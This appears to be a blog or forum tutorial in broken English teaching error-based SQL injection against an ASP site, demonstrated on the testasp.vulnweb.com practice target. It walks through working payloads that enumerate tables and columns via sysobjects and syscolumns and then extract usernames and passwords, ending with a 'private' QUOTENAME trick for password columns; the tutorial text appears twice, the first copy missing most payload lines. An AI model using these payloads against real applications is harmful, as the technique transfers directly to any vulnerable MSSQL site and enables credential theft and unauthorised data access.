Hello everyone and apologized for the Poor English Language I have
I would like to thank ๖ۣۜDan for everything I've learned from it and all its aid to me
Today we will learn penetrate asp site
ok site :
This site is programmed to test the penetration
Get the Table :
demo :
We get this :
Conversion failed when converting the nvarchar value 'DF__posts__threadid__00551192' to data type int.
To extract all tables :
demo :
We get this :
Conversion failed when converting the nvarchar value 'threads' to data type int.
Then we replace the first table in Table II
demo :
We get this :
Conversion failed when converting the nvarchar value 'users' to data type int.
table is users
Get columns from table users :
we add table
+or 1=convert(int,(select+top+1+name+from+syscolumns+where+colid=1+and+id=(select+top+1+id+from+sysobjects+where+name='users')))
demo :
We get this :
Conversion failed when converting the nvarchar value 'uname' to data type int.
first column : uname
Next column to extract the change in the number colid=1 to colid=2
demo :
We get this :
Conversion failed when converting the nvarchar value 'upass' to data type int.
The second column : upass
Next column to extract the change in the number colid = 3
demo :
We get this :
Conversion failed when converting the nvarchar value 'email' to data type int.
The third column : email
Now we have columns username and password, email
Extract data
demo :
We get this :
Conversion failed when converting the nvarchar value ' rapid7: injected_value' to data type int.
We reiterate that a column with upass and email
Note sometimes does not show data from the column password
To overcome this we use this thing - it's private method to me -
And We're Done !
I apologize for any mistake
I would like to thank ๖ۣۜDan for everything I've learned from it and all its aid to me
Today we will learn penetrate asp site
ok site :
This site is programmed to test the penetration
PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1 Get the Table :
PHP Code:
+or+1=convert(int,(select+top+1+name+from+sysobjects)) demo :
PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or+1=convert(int,(select+top+1+name+from+sysobjects)) We get this :
Conversion failed when converting the nvarchar value 'DF__posts__threadid__00551192' to data type int.
To extract all tables :
PHP Code:
+or+1=convert(int,(select+top+1+name+from+sysobjects+where+name+>'table')) demo :
PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or+1=convert(int,(select+top+1+name+from+sysobjects+where+name+>'DF__posts__threadid__00551192')) We get this :
Conversion failed when converting the nvarchar value 'threads' to data type int.
Then we replace the first table in Table II
demo :
PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or+1=convert(int,(select+top+1+name+from+sysobjects+where+name+>'threads')) We get this :
Conversion failed when converting the nvarchar value 'users' to data type int.
table is users
Get columns from table users :
PHP Code:
+or 1=convert(int,(select+top+1+name+from+syscolumns+where+colid=1+and+id=(select+top+1+id+from+sysobjects+where+name='table'))) we add table
+or 1=convert(int,(select+top+1+name+from+syscolumns+where+colid=1+and+id=(select+top+1+id+from+sysobjects+where+name='users')))
demo :
PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or 1=convert(int,(select+top+1+name+from+syscolumns+where+colid=1+and+id=(select+top+1+id+from+sysobjects+where+name='users'))) We get this :
Conversion failed when converting the nvarchar value 'uname' to data type int.
first column : uname
Next column to extract the change in the number colid=1 to colid=2
demo :
PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or 1=convert(int,(select+top+1+name+from+syscolumns+where+colid=2+and+id=(select+top+1+id+from+sysobjects+where+name='users'))) We get this :
Conversion failed when converting the nvarchar value 'upass' to data type int.
The second column : upass
Next column to extract the change in the number colid = 3
demo :
PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or 1=convert(int,(select+top+1+name+from+syscolumns+where+colid=3+and+id=(select+top+1+id+from+sysobjects+where+name='users'))) We get this :
Conversion failed when converting the nvarchar value 'email' to data type int.
The third column : email
Now we have columns username and password, email
Extract data
PHP Code:
+or+1=convert(int,(select+top+1+column+from+table)) demo :
PHP Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or+1=convert(int,(select+top+1+uname+from+users)) We get this :
Conversion failed when converting the nvarchar value ' rapid7: injected_value' to data type int.
We reiterate that a column with upass and email
Note sometimes does not show data from the column password
To overcome this we use this thing - it's private method to me -
PHP Code:
+and+1=convert(int,(select+top+1+QUOTENAME(Password column,'''')+from+users))-- And We're Done !
I apologize for any mistake
0 comments:
Post a Comment